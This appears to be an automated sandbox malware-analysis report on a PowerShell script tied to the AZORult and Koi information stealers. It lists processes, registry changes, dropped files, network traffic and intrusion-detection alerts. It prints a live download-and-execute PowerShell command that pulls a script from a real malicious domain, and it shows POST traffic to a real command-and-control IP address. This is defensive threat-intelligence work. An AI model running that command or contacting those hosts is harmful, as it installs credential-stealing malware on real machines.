| File name: | a.ps1 |
| Full analysis: | https://app.any.run/tasks/811b853b-f7b8-4b13-ae05-0cb5937bec9c |
| Verdict: | Malicious activity |
| Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
| Analysis date: | March 08, 2024, 23:06:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (4140) |
| MD5: | 336E35830D0E64CAE027CAE5C1B39989 |
| SHA1: | D9F249DE30DF38BB657429CB3A45D74BF2A5BCF2 |
| SHA256: | B56D86E0CDF97BCF589BFCAE08E4D39FA9B54D72E9B8053D5E4B748C1E611279 |
| SSDEEP: | 192:ymlvGCJXJD6+qUClbRZqwiJY5AH+W4BJeGZjf6H1nThTvTx:ymlvPA+yo+yx |
| .ini | | | Generic INI configuration (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2148 | C:\Windows\System32\wscript.exe "C:\ProgramData\agent.js" | C:\Windows\System32\wscript.exe | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 3672 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\admin\Desktop\a.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3956 | powershell -command IEX(IWR -UseBasicParsing 'https://stuffstore.org/wp-content/uploads/sd2.ps1') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3992 | "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://stuffstore.org/wp-content/uploads/sd2.ps1')" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3672) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | delete value | Name: | ProxyServer |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3672 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:753DF6889FD7410A2E9FE333DA83A429 | SHA256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78 | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17f5ba.TMP | binary | |
MD5:0268C3470C936E6FBAC2945B9E1C2099 | SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9 | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TarFD3D.tmp | binary | |
MD5:DD73CEAD4B93366CF3465C8CD32E2796 | SHA256:A6752B7851B591550E4625B832A393AABCC428DE18D83E8593CD540F7D7CAE22 | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:42E3956892291F5EE35E1B989213EF05 | SHA256:D4E6947871B5FD00AD32F8707479DD6EC92AB65D8C6D157B1C0C3D99D575E468 | |||
| 3956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pa5zszbd.vj3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Local\Temp\4o4oeusj.igu.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Local\Temp\CabFD3C.tmp | compressed | |
MD5:753DF6889FD7410A2E9FE333DA83A429 | SHA256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78 | |||
| 3956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\4kmhvfs4.f2a.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:F44000872206B3ACEC399822E21AE051 | SHA256:A1A50BCB76578924A8DE972F6A600F3E11A323C468829B021C8FC9EFD93D74A6 | |||
| 3672 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:6675EDE59684F4A119D2E5DA282AFBE6 | SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3672 | powershell.exe | GET | 200 | 23.197.49.187:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c425c3f07ab1ff72 | unknown | compressed | 67.5 Kb | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3956 | powershell.exe | GET | 200 | 45.67.34.39:80 | http://45.67.34.39/index.php?id=90059c37-1320-41a4-b58d-2b75a9850d2f&subid=kMyG6X2h | unknown | text | 59 b | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
3672 | powershell.exe | POST | 200 | 45.67.34.39:80 | http://45.67.34.39/instamp.php | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3672 | powershell.exe | 77.111.127.145:443 | stuffstore.org | ACE Telecom Kft | HU | unknown |
3672 | powershell.exe | 23.197.49.187:80 | ctldl.windowsupdate.com | Akamai International B.V. | JP | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3672 | powershell.exe | 45.67.34.39:80 | — | Stark Industries Solutions Ltd | RO | unknown |
3956 | powershell.exe | 77.111.127.145:443 | stuffstore.org | ACE Telecom Kft | HU | unknown |
3956 | powershell.exe | 45.67.34.39:80 | — | Stark Industries Solutions Ltd | RO | unknown |
Domain | IP | Reputation |
|---|---|---|
stuffstore.org |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3956 | powershell.exe | A Network Trojan was detected | ET MALWARE Win32/Koi Stealer CnC Checkin |
3956 | powershell.exe | A Network Trojan was detected | LOADER [ANY.RUN] Koi HTTP GET Request |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
3672 | powershell.exe | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |